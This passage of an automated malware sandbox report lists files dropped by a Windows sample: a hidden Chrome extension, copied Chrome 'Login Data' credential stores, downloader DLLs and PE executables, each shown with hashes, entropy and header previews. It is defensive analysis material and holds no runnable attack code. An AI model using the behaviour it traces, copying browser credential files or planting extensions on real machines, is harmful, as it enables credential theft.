                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\manifest.json
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.html
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Login Data1607186571889
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Login Data1607186582639
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Login Data1607186588249
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.log
Process:C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):135
Entropy (8bit):5.045303121991894
Encrypted:false
SSDEEP:3:QHXMKa/xwwUCztJXILKNUhh+9Am12MFuAvOAsDeieVyn:Q3La/xwczfIWW+P12MUAvvrs
MD5:BB527FDBC763485B0662FCCFD53AA00A
SHA1:86438ECBAF308B24FA264C7B6ECECDABD1338DC0
SHA-256:6158C0B5B794617AAD8DA6D671FEF9EDE9CAB2AA9A9FAD91D038739DFF5CEDBD
SHA-512:2003E36806330552D7DD5E633F24A67F2F4226C12EE43A6F79BB709727DD52910CA5EAF336F9C1E5733C66BC3075CA24CACA19D086BE373B76AA08D3FA818106
Malicious:true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.JScript, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
C:\Users\user\AppData\Local\Temp\1607186617055
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Temp\1607186619758
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
Process:C:\Program Files (x86)\71eza90awf48\aliens.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):487587840
Entropy (8bit):0.14148337259986293
Encrypted:false
SSDEEP:
MD5:17DADCF866BF1C23879BECB8AC4386D5
SHA1:B8B58997D30C327EAB2F75E7903A99DC9156A562
SHA-256:4CD4B76802D5E8770E1609DD3816FB254B6491A80CB89A6A613320796E023CCE
SHA-512:2C753F690AB872DDF7D18844B72AF1F9B769E141927C84BD7CF37336FE96E1E004D8518C75335FD526EB5DB44553406D687AE3D6389204C1D0819D86BC0959FB
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview: MZ......................@............................................@.....3.!This program cannot be run in DOS mode....$.......g.&.#aH.#aH.#aH..?L.%aH.N<N. aH.N<I.,aH.#aI..aH..?L.(aH..?.."aH..?J."aH.Rich#aH.........................PE..L....sQY.................v....... .. 9............@.................................Ti....@.............................................0...........l..89..........p...T..............................@............................................text...bt.......v.................. ....rdata..(#.......$...z..............@..@.data...............................@....ndata... ...`...........................rsrc....0.......2..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\MSI5715.tmp
Process:C:\Windows\SysWOW64\msiexec.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Temp\download\atl71.dll
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
Preview:
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:empty
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\download_engine.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ecv38E9.tmp
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\1607186572092.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ecv77D7.tmp
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\1607186588295.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                  Process:C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):540456
                                                                                                                                                  Entropy (8bit):6.4900404695826275
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:GUBa9WxfxYRW3vwDaduy2NBCzrCJDVxsR7LafByUb2iqyTOHD:da9WxfiRCv2anZnXtLa32idOHD
                                                                                                                                                  MD5:EB948284236E2D61EAE0741280265983
                                                                                                                                                  SHA1:D5180DB7F54DE24C27489B221095871A52DC9156
                                                                                                                                                  SHA-256:DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
                                                                                                                                                  SHA-512:6D8087022EE62ACD823CFA871B8B3E3251E44F316769DC04E2AD169E9DF6A836DBA95C3B268716F2397D6C6A3624A9E50DBE0BC847F3C4F3EF8E09BFF30F2D75
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: h1GodtbhC8.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: KeJ7Cl7flZ.exe, Detection: malicious, Browse
                                                                                                                                                  Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......A.....}...}...}^..|...}...|...}^..|...}^..|...}^..|...}^..|$..}...}x..}...|...}...|...}...|z..}...|...}...|...}..?}...}..W}...}...|...}Rich...}........................PE..L....mU_...........!.....2...................P.......................................8....@.........................@...\................"........... ..(....0..LH..X(..p....................).......(..@............P...............................text....1.......2.................. ..`.rdata...]...P...^...6..............@..@.data....I..........................@....rsrc....".......$..................@..@.reloc..LH...0...J..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
Process:C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4387715
Entropy (8bit):7.97481744127675
Encrypted:false
SSDEEP:98304:MemWK3AGUr0csa0JN5DHJiLvIELr2zEj94woNcqCYX/WDvPHjAOLutkiUs:pmWK3AG6ga0jVgLIEV4FLzeDvPH5AUs
MD5:69C9BA53239D6838D05594D96A36DEA3
SHA1:3DE1717040C9803FF67EF6C0CD218B45FD051CA8
SHA-256:CFAADE4B15040D0EC25112E808AAADA0BBDC378B5E4439D8C7620FEDB6359CA1
SHA-512:FC86C62A014B11139476CF658B6EF97AB210D2A2E8B4128E58D9A186037764B328E819A345606272D5BDFDFE7729F402631214D9371BE0B60EBB7F45FCC90141
Malicious:false
Joe Sandbox View:
• Filename: h1GodtbhC8.exe, Detection: malicious
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....~.^..................................... ....@..........................0............@.............................4...4...<.... ..p.......................d"......T............................D..@............ ..`....... ....................text...*........................... ..`.rdata...... ......................@..@.data... 7..........................@....didat..............................@....rsrc........ ......................@..@.reloc..d".......$..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibCa.dll
Process:C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:data
Category:dropped
Size (bytes):4096
Entropy (8bit):6.867501832742936
Encrypted:false
SSDEEP:96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
MD5:04F3C7753A4FCABCE7970BFA3B5C76FF
SHA1:34FC37D42F86DAC1FD1171A806471CDFEAE9817B
SHA-256:A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
SHA-512:F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
Malicious:false
                                                                                                                                                  Preview: ..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@..*..-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.....*..(....{.%...{.9....[...4.*..(".....}...."}A...}....D.}..6..B.(...+**D...* 6..si.......*...0.....,....(.....~......oRj..*&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o....*..*..`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..*rFq .b*..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U.*..*.
C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll
Process:C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):52520
Entropy (8bit):6.011934677477037
Encrypted:false
SSDEEP:1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
MD5:928E680DEA22C19FEBE9FC8E05D96472
SHA1:0A4A749DDFD220E2B646B878881575FF9352CF73
SHA-256:8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
SHA-512:5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
Malicious:false
Joe Sandbox View:
• Filename: h1GodtbhC8.exe, Detection: malicious
• Filename: KeJ7Cl7flZ.exe, Detection: malicious
Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
